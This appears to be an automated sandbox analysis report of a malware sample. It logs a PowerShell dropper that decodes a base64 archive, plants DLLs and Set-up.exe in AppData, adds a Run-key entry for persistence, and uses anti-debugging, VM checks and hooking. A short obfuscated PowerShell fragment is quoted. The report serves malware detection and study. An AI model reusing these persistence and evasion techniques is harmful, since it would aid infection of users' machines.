                    Source: Binary string: wntdll.pdbUGP source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000005.00000002.2039669387.000000006F031000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2170359070.000000006F031000.00000020.00000001.01000000.0000000A.sdmp

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($lkqUsSoM) [System.IO.File]::WriteAllBytes($tqCzfuAI, $siQuxqAO) $kzxTWYQy = New-Item -ItemType Directory -Path $avOQhqfd try { $AAIzCJGc = Expand-Archive -Path $tqCzf
                    Source: NAudio.dll.0.drStatic PE information: 0xCC972473 [Sat Oct 8 12:22:11 2078 UTC]
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBDB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_6BBDB5A7
                    Source: QtCore4.dll.0.drStatic PE information: real checksum: 0x283beb should be: 0x289700
                    Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
                    Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
                    Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
                    Source: Resource.ct.0.drStatic PE information: section name: .gxfg
                    Source: Resource.ct.0.drStatic PE information: section name: .retplne
                    Source: Resource.ct.0.drStatic PE information: section name: .voltbl
                    Source: Resource.ct.0.drStatic PE information: section name: CPADinfo
                    Source: Resource.ct.0.drStatic PE information: section name: LZMADEC
                    Source: Resource.ct.0.drStatic PE information: section name: _RDATA
                    Source: Resource.ct.0.drStatic PE information: section name: malloc_h
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB6B658 push ecx; ret 5_2_6BB6B66B
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB52D88 push eax; ret 5_2_6BB52DA6
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB60CC5 push ecx; ret 5_2_6BB60CD8
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC43801 push ecx; ret 8_2_6BC43814
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC43D95 push ecx; ret 8_2_6BC43DA8
                    Source: StarBurn.dll.0.drStatic PE information: section name: .text entropy: 6.935927781173939
                    Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.9169969425576285
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtCore4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\msvcp100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtGui4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\StarBurn.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtXml4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ctJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\wpkoqtsrtJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WPKOQTSRT
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YHG
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBAA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_6BBAA3DD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\SysWOW64\msiexec.exe System information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe API/Special instruction interceptor: Address: 6B847C44
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe API/Special instruction interceptor: Address: 6B847945
                    Source: C:\Windows\SysWOW64\more.com API/Special instruction interceptor: Address: 6B843B54
                    Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: DFBC87
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2752
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7025
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1905
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 737
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct
                    Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wpkoqtsrt
                    Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yhg
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe API coverage: 0.3 %
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe API coverage: 0.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812 Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 3264 Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2076 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep count: 1905 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep count: 737 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6BB781A1
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6BBAC8FD
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6BBACC23
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BB9BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,5_2_6BB9BE38
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: VMware
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
                    Source: Set-up.exe, 00000005.00000003.1990219260.0000000003F0A000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.2079722066.00000000042E6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
                    Source: Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
                    Source: Set-up.exe, 00000005.00000002.2023342146.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000002.2162985653.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp Binary or memory string: 4ld'>l.?AVQEmulationPaintEngine@@0/
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
                    Source: Set-up.exe, 00000005.00000003.1990219260.0000000003F0A000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2023342146.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp, Set-up.exe, 00000008.00000003.2079722066.00000000042E6000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2162985653.000000006C53F000.00000008.00000001.01000000.0000000C.sdmp Binary or memory string: .?AVQEmulationPaintEngine@@
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe API call chain: ExitProcess graph end node graph_5-23703
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_8-16542
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BB607A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6BB607A7
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe Code function: 5_2_6BBDB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_6BBDB5A7
